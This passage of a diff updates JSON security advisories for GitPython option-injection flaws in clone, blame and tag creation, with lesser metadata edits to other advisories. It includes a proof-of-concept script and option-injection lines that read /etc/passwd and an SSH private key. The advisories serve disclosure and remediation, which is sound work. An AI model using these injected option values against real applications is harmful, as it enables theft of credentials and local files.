raw `--separate-git-dir=...` token) without itself validating/rejecting it, and does not pass `allow_unsafe_options=True` intentionally. This is the identical trust model GitPython's own denylist already defends for `--template`/`--upload-pack`/`--config`/`--bundle-uri` on the very same code path — i.e. this option was clearly meant to be covered by the same guard and was simply omitted.\n- No authentication/role requirement inside GitPython itself; the vulnerable code runs the moment the host application calls the API with the option present.\n\n## Evidence\n- `git/repo/base.py:145-151` — `unsafe_git_init_options` includes `\"--separate-git-dir\"` with the comment \"Redirects the repository metadata to a caller-controlled path\".\n- `git/repo/base.py:153-165` — `unsafe_git_clone_options` (the list actually enforced on `_clone`) does **not** include `\"--separate-git-dir\"`.\n- `git/repo/base.py:1450-1452` — docstring of `clone_from`/`clone` explicitly documents `--separate-git-dir` as one of the options `allow_unsafe_options` is supposed to gate.\n- `git/repo/base.py:1495-1518` — `_clone()` special-cases `separate_git_dir` only to `Git.polish_url()` it (path normalization for URL-like values), then runs it through `Git.check_unsafe_options(options=..., unsafe_options=cls.unsafe_git_clone_options)` — which, per the list above, does not flag it.\n- PoC (`gitpython-001-poc.py`, embedded below) run against this exact checkout confirms the option reaches the real `git clone` subprocess unguarded and creates a full git directory outside the destination path, with `allow_unsafe_options` at its default `False`.\n\n## False-positive check (adversarial re-read)\n- **Is there a value-level check that would still stop this?** No — `check_unsafe_options` only inspects option *names* (via `_canonicalize_option_name`) against the denylist; it performs no filesystem/path validation on `separate_git_dir`'s value, and no other guard in `_clone()` touches this kwarg besides the `Git.polish_url()` normalization (which does not reject arbitrary paths).\n- **Is `--separate-git-dir` perhaps a no-op or safely sandboxed for `clone` specifically (unlike `init`)?** No — confirmed empirically: the option reaches the real `git` binary unmodified and git honors it exactly as documented, writing the full metadata tree to the given path.\n- **Could this be the exact bug already covered by one of the 26 published GHSAs?** Checked all 26 entries in `_known-advisories.json` (Filter 0): `GHSA-9rj7-rf2p-w77r` covers `--template` in `Repo.init`; `GHSA-6p8h-3wgx-97gf` covers `--template` in clone (already fixed, present in `unsafe_git_clone_options`); `GHSA-hmq2-w58f-27jc` covers arbitrary repo creation via unvalidated **`.gitmodules` submodule names** (a different code path — `Submodule`, not `Repo.clone_from()` kwargs). None reference `--separate-git-dir` on the clone path. This is a distinct, currently-unpatched gap.\n- **Does this require an unrealistic precondition?** The precondition (host app forwards a kwarg into `clone_from`/`clone`) is identical to the precondition already accepted by the maintainers for the sibling entries in the same list (`--template`, `--upload-pack`, `--config`, `--bundle-uri`) — i.e. it is the same threat model the guard exists to cover, just missing one entry.\n- Verdict: no concrete blocker found. **CONFIRMED.**\n\n## Remediation\nAdd `\"--separate-git-dir\"` (and its `-` alias if git ever adds one — currently there is none) to `Repo.unsafe_git_clone_options` in `git/repo/base.py`, matching `unsafe_git_init_options`. Since `Repo._clone()` already special-cases `separate_git_dir` for `Git.polish_url()` normalization, the fix is a one-line addition to the existing list, consistent with how `GHSA-6p8h-3wgx-97gf` added `--template` to the same list.\n\n## Confidence\nHigh. Root cause is a one-line, unambiguous omission the maintainers' own docstring contradicts; PoC reproduces cleanly and deterministically against the current HEAD; no plausible false-positive path found.\n\n\n## Proof-of-Concept source (`gitpython-001-poc.py`)\n\n```python\n#!/usr/bin/env python3\n\"\"\"\nGITPYTHON-001 PoC: Repo.clone_from(separate_git_dir=...) is not in\nunsafe_git_clone_options, so it reaches `git clone` unguarded and writes a\nfull git directory (config, hooks/, objects/, refs/, ...) to an\nattacker-controlled path OUTSIDE the intended destination directory, with\nallow_unsafe_options left at its default of False.\n\nRun against the GitPython source tree under test, e.g.:\n PYTHONPATH=\":/gitdb:/smmap\" python3 gitpython-001-poc.py \n\nBenign: only writes/reads inside the given workdir. No destructive/exfiltrating\npayload. Exits non-zero and prints \"NOT VULNERABLE\" if the guard blocks the option\nor the write does not escape the destination directory.\n\"\"\"\nimport os\nimport sys\nimport subprocess\n\n\ndef main():\n workdir = sys.argv[1] if len(sys.argv) > 1 else \"/tmp/gitpython-001-poc\"\n src = os.path.join(workdir, \"src\")\n dest = os.path.join(workdir, \"dest\")\n sentinel_dir = os.path.join(workdir, \"OUTSIDE_SENTINEL\")\n target_gitdir = os.path.join(sentinel_dir, \"redirected.git\")\n\n for p in (src, dest, sentinel_dir):\n os.makedirs(p, exist_ok=True)\n\n # Minimal benign source repo to clone from.\n subprocess.run([\"git\", \"init\", \"-q\", \"-b\", \"main\", src], check=True)\n subprocess.run([\"git\", \"-C\", src, \"config\", \"user.email\", \"test@example.com\"], check=True)\n subprocess.run([\"git\", \"-C\", src, \"config\", \"user.name\", \"Test\"], check=True)\n with open(os.path.join(src, \"file.txt\"), \"w\") as f:\n f.write(\"hello\\n\")\n subprocess.run([\"git\", \"-C\", src, \"add\", \"file.txt\"], check=True)\n subprocess.run([\"git\", \"-C\", src, \"commit\", \"-q\", \"-m\", \"init\"], check=True)\n\n import git # gitpython under test\n\n print(\"unsafe_git_clone_options =\", git.Repo.unsafe_git_clone_options)\n assert \"--separate-git-dir\" not in git.Repo.unsafe_git_clone_options, (\n \"guard now includes --separate-git-dir; PoC no longer applicable, target patched\"\n )\n\n try:\n repo = git.Repo.clone_from(src, dest, separate_git_dir=target_gitdir)\n except git.exc.UnsafeOptionError as e:\n print(\"NOT VULNERABLE: blocked by UnsafeOptionError:\", e)\n sys.exit(1)\n\n wrote_outside = os.path.isdir(os.path.join(target_gitdir, \"hooks\")) and os.path.isfile(\n os.path.join(target_gitdir, \"config\")\n )\n gitlink_points_outside = False\n with open(os.path.join(dest, \".git\")) as f:\n gitlink = f.read().strip()\n gitlink_points_outside = target_gitdir in gitlink\n\n print(\"repo.git_dir =\", repo.git_dir)\n print(\"wrote git directory outside dest (sentinel) =\", wrote_outside)\n print(\"dest/.git gitlink points outside dest =\", gitlink_points_outside)\n\n if wrote_outside and gitlink_points_outside:\n print(\"VULNERABLE: git directory created at attacker-controlled path \"\n f\"outside the clone destination: {target_gitdir}\")\n sys.exit(0)\n else:\n print(\"NOT VULNERABLE: sentinel not observed\")\n sys.exit(1)\n\n\nif __name__ == \"__main__\":\n main()\n\n```", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + }, { "type": "CVSS_V4", - "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" } ], "references": [ + { + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-8mcc-hrx5-hvxc" + }, { "type": "ADVISORY", - "url": "https://www.vulncheck.com/advisories/gitpython-before-path-traversal-via-separate-git-dir" + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-78677" }, { - "type": "EVIDENCE", - "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-8mcc-hrx5-hvxc" + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/pull/2210" + }, + { + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/commit/b68afff45af0f49e79a3e2d2162018986b37ad5d" + }, + { + "type": "PACKAGE", + "url": "https://github.com/gitpython-developers/GitPython" + }, + { + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/releases/tag/3.1.59" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/gitpython/PYSEC-2026-3787.yaml" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-path-traversal-via-separate-git-dir" } ] } diff --git a/advisories/BREW-tartufo-CVE-2026-78678.json b/advisories/BREW-tartufo-CVE-2026-78678.json index 6e12181d455..4a15d84ac39 100644 --- a/advisories/BREW-tartufo-CVE-2026-78678.json +++ b/advisories/BREW-tartufo-CVE-2026-78678.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-tartufo-CVE-2026-78678", "published": "2026-09-04T10:12:20Z", - "modified": "2026-09-05T10:16:40Z", + "modified": "2026-09-10T21:09:42Z", "upstream": [ "PYSEC-2026-3788", "CVE-2026-78678", @@ -52,21 +52,34 @@ } ] }, - "details": "GitPython versions before 3.1.59 contain an incomplete denylist in the unsafe_git_revision_options guard that omits --contents and -S options, allowing attackers to read arbitrary files by passing these options to Repo.blame(). Attackers can supply revision values like --contents=/etc/passwd to leak file contents through the blame result returned to the caller.", + "summary": "GitPython: Incomplete unsafe_git_revision_options denylist omits --contents/-S, enabling arbitrary file read via Repo.blame()", + "details": "## Summary\n`Repo.blame()` / `Repo.blame_incremental()` guard forwarded revision options against `unsafe_git_revision_options`, but that denylist only contains the file-WRITE options `--output`/`-o`. `git blame` also honors `--contents ` and `-S `, which cause the file's lines to be echoed into the blame result — an arbitrary file READ. Neither option is in the denylist, so a caller-influenced revision value of `--contents=` passes the guard and leaks file contents. This is a distinct sink-option and impact class (READ) from GHSA-956x-8gvw-wg5v (which addressed the blame `--output` WRITE), directly analogous to GHSA-539m-9xh6-q6rr (archive READ gap accepted separately from the archive write/exec advisory).\n\n## Root Cause\n`unsafe_git_revision_options = [\"--output\",\"-o\"]` (`git/repo/base.py:188`). The `rev` string is passed to `_option_candidates([rev], kwargs)` and placed BEFORE the `--` separator (base.py:841). The canonical name of `--contents=...` is `contents`, which is not on the denylist, so no `UnsafeOptionError` is raised. The trailing `--` protects only the pathspec, not the option before the revision.\n\n## Impact\nArbitrary local file read at the privileges of the host process; the file's line contents appear in the blame result returned to the caller. Pure VALUE control (the caller forwards a user-influenced revision string). Default `allow_unsafe_options=False`.\n\n## Proof of Concept\n```python\nresult = repo.blame(\"--contents=/etc/passwd\", \"a.txt\")\n# result rows carry the victim file's line text\n```\n\n## Attack Chain\n1. Entry: app calls `repo.blame(rev, file)` with attacker `rev=\"--contents=/etc/passwd\"` (or kwarg `contents=\"/etc/passwd\"`, or `-S`).\n2. Check: `Git.check_unsafe_options(_option_candidates([rev,...], kwargs), unsafe_git_revision_options)` @ base.py:841. Guard: denylist = `[\"--output\",\"-o\"]` only. Bypass proof: canonical name `contents` ∉ denylist → no error.\n3. Sink: `self.git.blame(rev, \"--\", file, p=True, ...)`. argv (observed): `['git','blame','-p','--contents=','HEAD','--','a.txt']`.\n4. Impact: blame result rows carry the victim file's line text.\n\n## Bypass Evidence\nIndependently reproduced (independent test harness, default `allow_unsafe_options=False`): `blame('--contents=','a.txt')` → guard PASSED; result rows = `['GATE_SECRET_LINE_A','GATE_SECRET_LINE_B']`. Control: `blame('--output=…')` still BLOCKED (guard active on this path). `-S` kwarg argv also reaches git unguarded.\n\n## Affected Versions\n`GitPython <= 3.1.58` (denylist present verbatim on the latest release tag).\n\n## Suggested Fix\nPrefer an allowlist of blame options; at minimum add `--contents`/`-S` (and any other path-taking blame options) to `unsafe_git_revision_options`, and make the membership rule \"the option takes a filesystem path\" rather than \"the option writes output\".\n\n---\nReported by **zx (Jace)** — GitHub: @manus-use", "severity": [ { - "type": "CVSS_V4", - "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" } ], "references": [ + { + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-5xxx-qhh7-9287" + }, { "type": "ADVISORY", - "url": "https://www.vulncheck.com/advisories/gitpython-before-arbitrary-file-read-via-repo-blame" + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-78678" }, { - "type": "EVIDENCE", - "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-5xxx-qhh7-9287" + "type": "PACKAGE", + "url": "https://github.com/gitpython-developers/GitPython" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/gitpython/PYSEC-2026-3788.yaml" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-arbitrary-file-read-via-repo-blame" } ] } diff --git a/advisories/BREW-tartufo-CVE-2026-78679.json b/advisories/BREW-tartufo-CVE-2026-78679.json new file mode 100644 index 00000000000..31e67e8232f --- /dev/null +++ b/advisories/BREW-tartufo-CVE-2026-78679.json @@ -0,0 +1,93 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-tartufo-CVE-2026-78679", + "published": "2026-09-10T21:09:42Z", + "modified": "2026-09-10T21:09:42Z", + "upstream": [ + "GHSA-3wxw-xv34-2frg", + "CVE-2026-78679", + "PYSEC-2026-3837" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "tartufo", + "purl": "pkg:brew/tartufo" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "5.0.0" + }, + { + "fixed": "6.0.0_7" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "3.1.59", + "resource": "gitpython", + "resource_purl": "pkg:pypi/gitpython@3.1.61" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "gitpython", + "subject_version": "3.1.61", + "key": "pkg:pypi/gitpython@3.1.61", + "resource": "gitpython" + } + ] + }, + "summary": "GitPython: TagReference.create positional reference bypasses kwargs-only --file guard, enabling arbitrary file read (incomplete fix of 3af0c251)", + "details": "## Summary\n`TagReference.create()` forwards a caller-influenced positional `reference` value into `git tag` without it ever being inspected by the unsafe-option guard, allowing an arbitrary file read (the file's contents are returned in-band as the annotated tag message). This is an incomplete-fix bypass of commit `3af0c251` (the fix for GHSA-3f7w-8rr8-f37f's tag instance).\n\n## Root Cause\nThe fix `3af0c251` added `unsafe_git_tag_options = [\"--file\",\"-F\"]` and a guard call, but the guard is `Git.check_unsafe_options(options=Git._option_candidates([], kwargs), unsafe_options=...)` at `git/refs/tag.py:139` — it passes an EMPTY args list and inspects **kwargs only**. The dangerous values `path` and `reference` are POSITIONALS (`args = (path, reference)`, tag.py:156), placed before any `--`. A user-influenced `reference=\"--file=\"` therefore reaches `git tag` as the exact `--file` option the fix intended to block, creating an annotated tag whose message is the file's contents.\n\n## Impact\nArbitrary local file read at the privileges of the host process; contents returned in-band via `tagref.tag.message`. Requires the embedding application to forward a caller-influenced `reference` value into `TagReference.create()` (pure VALUE control — the CVE-2026-42215 threat model). Default `allow_unsafe_options=False`.\n\n## Proof of Concept\n```python\nfrom git import TagReference\nt = TagReference.create(repo, \"vpwn\", reference=\"--file=/home/app/.ssh/id_rsa\")\nprint(t.tag.message) # contents of the file\n```\n\n## Attack Chain\n1. Entry: app calls `TagReference.create(repo, name, reference=)` with `reference=\"--file=/home/app/.ssh/id_rsa\"`.\n2. Check: `Git.check_unsafe_options(_option_candidates([], kwargs), [\"--file\",\"-F\"])` @ tag.py:137-141. Guard: denylist includes `--file`/`-F`. Bypass proof: `_option_candidates` receives `args=[]` → the positional `reference` is never a candidate (the kwarg spelling `file=\"…\"` IS blocked; only the positional escapes).\n3. Sink: `repo.git.tag(*args, **kwargs)` @ tag.py:158 → no `--`. argv (observed): `['git','tag','-f','vpwn','--file=']`.\n4. Impact: annotated tag created; `tagref.tag.message` == file contents (arbitrary file read).\n\n## Bypass Evidence\nIndependently reproduced (independent test harness, git 2.43.0, default `allow_unsafe_options=False`): `TagReference.create(repo,'vp','--file=')` → PASSED; `tag.message == 'GATE_SECRET_LINE_A\\nGATE_SECRET_LINE_B'`. Control: `TagReference.create(..., file='')` → `UnsafeOptionError: --file is not allowed`. Fix-commit read: `3af0c251` adds `_option_candidates([], kwargs)` (empty args → positional never a candidate).\n\n## Affected Versions\n`GitPython <= 3.1.58` (sink present verbatim on the latest release tag; `git diff 3.1.57..HEAD` touches only test files).\n\n## Suggested Fix\nInclude the positional `reference` (and `path`) in the option-candidate list passed to `check_unsafe_options`, or place a `--` separator before the positional arguments in `TagReference.create()`.\n\n---\nReported by **zx (Jace)** — GitHub: @manus-use", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-3wxw-xv34-2frg" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-78679" + }, + { + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/pull/2208" + }, + { + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/commit/1b0d2d9b91575f7db44ef4ff58ac37fc9335e5f6" + }, + { + "type": "PACKAGE", + "url": "https://github.com/gitpython-developers/GitPython" + }, + { + "type": "WEB", + "url": "https://github.com/gitpython-developers/GitPython/releases/tag/3.1.59" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-arbitrary-file-read-via-tagreference-create" + } + ] +} diff --git a/advisories/BREW-volk-CVE-2010-2480.json b/advisories/BREW-volk-CVE-2010-2480.json index bdf25710fec..148337da651 100644 --- a/advisories/BREW-volk-CVE-2010-2480.json +++ b/advisories/BREW-volk-CVE-2010-2480.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-volk-CVE-2010-2480", "published": "2026-08-13T17:48:55Z", - "modified": "2026-08-13T17:48:55Z", + "modified": "2026-09-10T21:20:24Z", "upstream": [ "GHSA-7q8x-38mc-p84f", "CVE-2010-2480", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "mako", - "subject_version": "1.3.12", - "key": "pkg:pypi/mako@1.3.12", - "resource": "mako" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-volk-CVE-2022-40023.json b/advisories/BREW-volk-CVE-2022-40023.json index f76d797bf60..e13782eca1b 100644 --- a/advisories/BREW-volk-CVE-2022-40023.json +++ b/advisories/BREW-volk-CVE-2022-40023.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-volk-CVE-2022-40023", "published": "2026-08-13T17:48:55Z", - "modified": "2026-08-13T17:48:55Z", + "modified": "2026-09-10T21:20:24Z", "upstream": [ "GHSA-v973-fxgf-6xhp", "CVE-2022-40023", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "mako", - "subject_version": "1.3.12", - "key": "pkg:pypi/mako@1.3.12", - "resource": "mako" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-volk-CVE-2026-41205.json b/advisories/BREW-volk-CVE-2026-41205.json index 37092a86d03..18a4c35e6d7 100644 --- a/advisories/BREW-volk-CVE-2026-41205.json +++ b/advisories/BREW-volk-CVE-2026-41205.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-volk-CVE-2026-41205", "published": "2026-08-13T17:48:55Z", - "modified": "2026-08-13T17:48:55Z", + "modified": "2026-09-10T21:20:24Z", "upstream": [ "GHSA-v92g-xgxw-vvmm", "CVE-2026-41205", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "mako", - "subject_version": "1.3.12", - "key": "pkg:pypi/mako@1.3.12", - "resource": "mako" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-volk-CVE-2026-44307.json b/advisories/BREW-volk-CVE-2026-44307.json index d14eebdc685..7296c4e5f6c 100644 --- a/advisories/BREW-volk-CVE-2026-44307.json +++ b/advisories/BREW-volk-CVE-2026-44307.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-volk-CVE-2026-44307", "published": "2026-08-13T17:48:55Z", - "modified": "2026-08-13T17:48:55Z", + "modified": "2026-09-10T21:20:24Z", "upstream": [ "GHSA-2h4p-vjrc-8xpq", "CVE-2026-44307", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "mako", - "subject_version": "1.3.12", - "key": "pkg:pypi/mako@1.3.12", - "resource": "mako" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-west-CVE-2017-18342.json b/advisories/BREW-west-CVE-2017-18342.json index 12d3b116751..fda0121ca55 100644 --- a/advisories/BREW-west-CVE-2017-18342.json +++ b/advisories/BREW-west-CVE-2017-18342.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-west-CVE-2017-18342", "published": "2026-08-13T17:52:04Z", - "modified": "2026-08-13T17:52:04Z", + "modified": "2026-09-10T21:24:20Z", "upstream": [ "GHSA-rprw-h62v-c2w7", "CVE-2017-18342", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-west-CVE-2019-20477.json b/advisories/BREW-west-CVE-2019-20477.json index 59ddf2c9542..d87a527f77a 100644 --- a/advisories/BREW-west-CVE-2019-20477.json +++ b/advisories/BREW-west-CVE-2019-20477.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-west-CVE-2019-20477", "published": "2026-08-13T17:52:04Z", - "modified": "2026-08-13T17:52:04Z", + "modified": "2026-09-10T21:24:20Z", "upstream": [ "GHSA-3pqx-4fqf-j49f", "CVE-2019-20477", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-west-CVE-2020-14343.json b/advisories/BREW-west-CVE-2020-14343.json index 476ba3db9ce..9068d3581f6 100644 --- a/advisories/BREW-west-CVE-2020-14343.json +++ b/advisories/BREW-west-CVE-2020-14343.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-west-CVE-2020-14343", "published": "2026-08-13T17:52:04Z", - "modified": "2026-08-13T17:52:04Z", + "modified": "2026-09-10T21:24:20Z", "upstream": [ "GHSA-8q59-q68h-6hv4", "CVE-2020-14343", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-west-CVE-2020-1747.json b/advisories/BREW-west-CVE-2020-1747.json index 57789a2881a..6a7439aae92 100644 --- a/advisories/BREW-west-CVE-2020-1747.json +++ b/advisories/BREW-west-CVE-2020-1747.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-west-CVE-2020-1747", "published": "2026-08-13T17:52:04Z", - "modified": "2026-08-13T17:52:04Z", + "modified": "2026-09-10T21:24:20Z", "upstream": [ "GHSA-6757-jp84-gxfx", "CVE-2020-1747", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyyaml", - "subject_version": "6.0.3", - "key": "pkg:pypi/pyyaml@6.0.3", - "resource": "pyyaml" - }, { "strategy": "registry", "ecosystem": "PyPI",